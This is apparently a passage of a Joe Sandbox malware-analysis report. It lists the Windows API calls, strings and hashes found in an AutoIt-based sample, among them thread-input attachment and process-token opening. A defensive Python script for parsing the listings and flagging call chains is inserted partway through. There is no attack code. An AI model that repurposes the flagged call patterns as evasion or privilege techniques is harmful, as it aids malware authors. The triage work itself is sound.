                                              • Instruction ID: 2baf7e9b0d6b440f841ac2520f3e3f373c00f2dc882b57504b0e67fd41e1b49c
                                              • Opcode Fuzzy Hash: c7ba55e12b09c95af8f8cf465bae3deb514c63a7797e89d3ff007f7ba5e9330e
                                              • Instruction Fuzzy Hash: 65F0BE31045218FBDB12AF55AC0EFEE3F99AF09311F048080FA51621E18BB41A50DBA9
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B8AA6F
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8AA82
                                              • GetCurrentThreadId.KERNEL32 ref: 00B8AA89
                                              • AttachThreadInput.USER32(00000000), ref: 00B8AA90
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 77a54eca7321748887e699e64faf027f1278a428be1211b6a65bea7a8c9aa12c
                                              • Instruction ID: 80d2d62337dbdbee7f025d3bab3b57c15825e58ca2232d1c59cbc23226eb4a2b
                                              • Opcode Fuzzy Hash: 77a54eca7321748887e699e64faf027f1278a428be1211b6a65bea7a8c9aa12c
                                              • Instruction Fuzzy Hash: EAE06D31545228FAEB217FA2DD0CEE77F5CEF1A7A1F048022F50996460CB718550CBE0
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00B3260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00B32617
                                              • SetBkMode.GDI32(?,00000001), ref: 00B3262C
                                              • GetStockObject.GDI32(00000005), ref: 00B32634
                                              • GetWindowDC.USER32(?,00000000), ref: 00B6C1C4
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B6C1D1
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00B6C1EA
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00B6C203
                                              • GetPixel.GDI32(00000000,?,?), ref: 00B6C223
                                              • ReleaseDC.USER32(?,00000000), ref: 00B6C22E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 492e77e6cc176d388d1ea795f41a3786eeec6fd145cea38ecf004c850cfe18a4
                                              • Instruction ID: f77914a0725e61fba022026821d63dfec1ad471b351e791961dff2518962a6eb
                                              • Opcode Fuzzy Hash: 492e77e6cc176d388d1ea795f41a3786eeec6fd145cea38ecf004c850cfe18a4
                                              • Instruction Fuzzy Hash: C7E0E531514244FBDB216F64AC4DBE87F51EB19332F1483A6FA69590E18B714590DB11
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00B89339
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B88F04), ref: 00B89340
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B88F04), ref: 00B8934D
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B88F04), ref: 00B89354
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: aed373e88decd964a23a61f99b9d2eb1f20b87d146e5e3882e9dab5fac70618d
                                              • Instruction ID: 6e8451877032a9aead2336b1157a9a4909a8de7bc27341189b7fb5dd861a4172
                                              • Opcode Fuzzy Hash: aed373e88decd964a23a61f99b9d2eb1f20b87d146e5e3882e9dab5fac70618d
                                              • Instruction Fuzzy Hash: 77E08632611211DFDB203FB19D0DF563BACEF58791F154858B246CB090EA349444D758
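The "APIs" bullets above are the most useful triage data in a report this long, but they are laid out one function at a time. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses listing lines in exactly the shape shown above into structured records, decodes the `00000028` value visible on the stack of the token-opening function (0x28 is `TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES`, the mask a program requests before adjusting a privilege; which call that stack slot belongs to is an assumption, since the report shows stack snapshots rather than typed arguments), and flags two call orderings present in this section: the `SendMessageTimeoutW` / `GetWindowThreadProcessId` / `AttachThreadInput` chain and the `GetCurrentProcess` / `OpenProcessToken` pair. The sample text is constructed from lines copied from the listing; the sequence labels and the `0x200` address heuristic are the example's own choices.

```python
"""Parse Joe Sandbox "APIs" listing lines and flag sensitive call orderings."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: lines copied in the shape of the report's "APIs" entries.
SAMPLE = """\
• GetCurrentThread.KERNEL32 ref: 00B89339
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00B88F04), ref: 00B89340
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B88F04), ref: 00B8934D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00B88F04), ref: 00B89354
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B8AA6F
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8AA82
• GetCurrentThreadId.KERNEL32 ref: 00B8AA89
• AttachThreadInput.USER32(00000000), ref: 00B8AA90
  • Part of subcall function 00B97C7F: _memset.LIBCMT ref: 00B97CB4
"""

# One listing line: optional bullet, optional "Part of subcall function X:",
# then Name.MODULE, optional "(args)", and the call-site address after "ref:".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<fn>[\w@$?]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    fn: str
    module: str
    ref: int                                  # address of the call site
    args: list = field(default_factory=list)  # int, str, or None for "?"
    subcall: Optional[int] = None             # set for "Part of subcall function" lines

def parse_arg(text):
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:       # occasionally the report shows a string literal here
        return text

def parse_listing(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:            # headers such as "APIs" / "Strings" are skipped
            continue
        calls.append(ApiCall(
            fn=m["fn"], module=m["mod"], ref=int(m["ref"], 16),
            args=[parse_arg(a) for a in m["args"].split(",")] if m["args"] else [],
            subcall=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls

# TOKEN_* access bits from winnt.h.
TOKEN_ACCESS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE",    0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE",   0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS",  0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}

def decode_mask(value, table):
    """Expand a bit mask into flag names, keeping any undefined bits as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names

def token_access_hints(calls):
    """Decode small constants on the stack of token-related calls as TOKEN_* masks.
    Heuristic (example's assumption): values below 0x200 are masks, not addresses."""
    hints = {}
    for c in calls:
        if c.fn in ("GetCurrentProcess", "OpenProcessToken", "OpenThreadToken"):
            for a in c.args:
                if isinstance(a, int) and 0 < a < 0x200:
                    hints[c.fn] = decode_mask(a, TOKEN_ACCESS)
    return hints

# Ordered call chains worth a second look; labels are the example's own.
SEQUENCES = {
    "attach-thread-input": ["SendMessageTimeoutW", "GetWindowThreadProcessId", "AttachThreadInput"],
    "open-process-token": ["GetCurrentProcess", "OpenProcessToken"],
}

def is_subsequence(needle, haystack):
    it = iter(haystack)
    return all(any(x == n for x in it) for n in needle)

def find_sequences(calls):
    """Return labels of SEQUENCES that appear, in order, among the direct calls."""
    names = [c.fn for c in calls if c.subcall is None]
    return [label for label, seq in SEQUENCES.items() if is_subsequence(seq, names)]

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    print(len(parsed), "calls;", find_sequences(parsed), token_access_hints(parsed))
```

Running it over the whole report (copy every "APIs" block into a file and feed it to `parse_listing`) turns the per-function bullets into one table that can be grouped by module or by call chain; the `subcall` field keeps the "Part of subcall function" lines separate so that sequence matching only considers the function's own direct calls.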
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00B70679
                                              • GetDC.USER32(00000000), ref: 00B70683
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B706A3
                                              • ReleaseDC.USER32(?), ref: 00B706C4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 5365795a476534a6390d6f809867637bb99c55ecb607d35983c4af973999cb81
                                              • Instruction ID: f4b8c38cc2872a044fd251a08567f20b283afe69b69da0e68a83162c3284cb5b
                                              • Opcode Fuzzy Hash: 5365795a476534a6390d6f809867637bb99c55ecb607d35983c4af973999cb81
                                              • Instruction Fuzzy Hash: 1CE01AB1810204EFCF01AFA0D848B5D7BF1EB8C311F218069F85AE7210DF3895519F50
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00B7068D
                                              • GetDC.USER32(00000000), ref: 00B70697
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B706A3
                                              • ReleaseDC.USER32(?), ref: 00B706C4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: dd50aacc13e990243d338682e442a0d817e28a656acfadf12242b91102dc2f71
                                              • Instruction ID: d4af0240cad2f188cd7f3798cb6268b48d044571caf6d38e9a10e1c1a7ba5eb3
                                              • Opcode Fuzzy Hash: dd50aacc13e990243d338682e442a0d817e28a656acfadf12242b91102dc2f71
                                              • Instruction Fuzzy Hash: BAE012B1810204EFCF11AFA0D808A9EBBF1AB8C311F218028F95AE7210DF3899518F50
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00B8C057
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: 3c9d497b27e5abb1f7a78957fa063f15fef4b309a59d04518f6eef46fe2a8bca
                                              • Instruction ID: ecd0e3a2f7f6d9cd958775159bfb60f4bb862c5bce4e2c2eb4fbaa899afc25aa
                                              • Opcode Fuzzy Hash: 3c9d497b27e5abb1f7a78957fa063f15fef4b309a59d04518f6eef46fe2a8bca
                                              • Instruction Fuzzy Hash: 5D913BB0200201DFDB54EF64C884E6ABBE5FF49710F1085ADE90ADB2A1DB71E845CB60
                                              APIs
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • __wcsnicmp.LIBCMT ref: 00B9B670
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B9B739
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 63566c877b3a8d67432ac01782e384eae921f3d43582bf58d5b6aa439c56bf08
                                              • Instruction ID: 9526b2334dcf72499474ad50040847d46d5d8695f24d6694a3c9dacccb099a7c
                                              • Opcode Fuzzy Hash: 63566c877b3a8d67432ac01782e384eae921f3d43582bf58d5b6aa439c56bf08
                                              • Instruction Fuzzy Hash: A2618075A00219AFCF14EF94D991EAEB7F4EF48710F1141E9F506AB291DB34AE40CB50
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00B3E01E
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B3E037
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: b08f368ebb362a785d562052acd563148e6216e1c25dba1801be88f4b034da5d
                                              • Instruction ID: 92e3ec6b52b6669505bd5b1c9dbe27f43e23ee9c64ac402f8b65dfe7de293b4d
                                              • Opcode Fuzzy Hash: b08f368ebb362a785d562052acd563148e6216e1c25dba1801be88f4b034da5d
                                              • Instruction Fuzzy Hash: EF514B71418B449BE320AF50E886BAFB7F8FF85314F51489EF1D942191EF70A929CB16
                                              APIs
                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00BB8186
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB819B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: 99ff51c518f183f3565e3ffb8068a22a45b9bf6ae3d2e0f7e60c9eca1395e97d
                                              • Instruction ID: 0d830d8eecdf9abb96aac9d08423f7e8b0af18f976bee338c4d2314eb143e0cc
                                              • Opcode Fuzzy Hash: 99ff51c518f183f3565e3ffb8068a22a45b9bf6ae3d2e0f7e60c9eca1395e97d
                                              • Instruction Fuzzy Hash: DD411974A012099FDB14DF68D881BEA7BF9FF08340F1041AAE904EB351DB71A956CFA0
                                              APIs
                                              • _memset.LIBCMT ref: 00BA2C6A
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BA2CA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: 099ed9da83e9da3461579562e3d4a362e5076c002357b1bc8df4033800a99b0b
                                              • Instruction ID: de84c1cd4fae0fe28deeae6203a3b0aefbaba0be2ebb7fa45985b856ed763edb
                                              • Opcode Fuzzy Hash: 099ed9da83e9da3461579562e3d4a362e5076c002357b1bc8df4033800a99b0b
                                              • Instruction Fuzzy Hash: 62311E71C00119ABCF11EFA8CC85AEEBFF9FF09314F1000A9F815A6162DB315A56DBA4
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00BB713C
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BB7178
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: f2e64ba00b36129044cf1ca5a73ab94bb472fae3507cedb97a4a9097848d42ea
                                              • Instruction ID: 2e64fcd1a601271d11cf661812f5877f2907cfb69b5c847e0c1d7999cdc75072
                                              • Opcode Fuzzy Hash: f2e64ba00b36129044cf1ca5a73ab94bb472fae3507cedb97a4a9097848d42ea
                                              • Instruction Fuzzy Hash: AE316A71150604ABEB109F68CC80EFB77E9FF88724F10965AF9A597190DAB1AC91CB60
                                              APIs
                                              • _memset.LIBCMT ref: 00B930B8
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B930F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 150049b4ee645b35391dba7da2de36aac6f58ca02efe7c30fb35c975d196ab04
                                              • Instruction ID: f66838445a24bfae3fe89da0a98c05a8ca6652fbcbc81259615f9972d1e508f6
                                              • Opcode Fuzzy Hash: 150049b4ee645b35391dba7da2de36aac6f58ca02efe7c30fb35c975d196ab04
                                              • Instruction Fuzzy Hash: 7331C3316003159BEF249F58C889BAEBBF8EB05B50F1440B9E985B61B1D7709B44CB50
                                              APIs
                                              • __snwprintf.LIBCMT ref: 00BA4132
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                              • API String ID: 3506404897-2584243854
                                              • Opcode ID: 0a2edcc2ab9a7d03c14624bb9fc301e725cfe8f02013487d93265fd4896c3074
                                              • Instruction ID: 0d6c0d07f77d6a16297a559881ec7d143c31a918e60e00b37e3524ae2bfb003c
                                              • Opcode Fuzzy Hash: 0a2edcc2ab9a7d03c14624bb9fc301e725cfe8f02013487d93265fd4896c3074
                                              • Instruction Fuzzy Hash: 37219330A0021DABCF10EF64CC81EAE7BF9EF55740F4444E4F905A7252DBB4AA85DBA1
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BB6D86
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB6D91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 315054c66c894e98f3cc705b6a18397ba73e2b816d098ebc478d27f7f41894f4
                                              • Instruction ID: 1377b612791271f250fd8259c2b75fefb4cf5285c9a49f41be3731f51e7e1d9b
                                              • Opcode Fuzzy Hash: 315054c66c894e98f3cc705b6a18397ba73e2b816d098ebc478d27f7f41894f4
                                              • Instruction Fuzzy Hash: 5A118271710208BFEF159F54DC81FFB3BAAEB88364F114179FA149B2A0DAB59C518760
                                              APIs
                                                • Part of subcall function 00B32111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                                • Part of subcall function 00B32111: GetStockObject.GDI32(00000011), ref: 00B32163
                                                • Part of subcall function 00B32111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              • GetWindowRect.USER32(00000000,?), ref: 00BB7296
                                              • GetSysColor.USER32(00000012), ref: 00BB72B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 3fb268bc056e4c7e12fe705954a6453093584dfa6028b9fea4e9f76417078b49
                                              • Instruction ID: 15bb08045b4c3dc0b876296b1207390c070026e09b7c08b6fa08537d882ef136
                                              • Opcode Fuzzy Hash: 3fb268bc056e4c7e12fe705954a6453093584dfa6028b9fea4e9f76417078b49
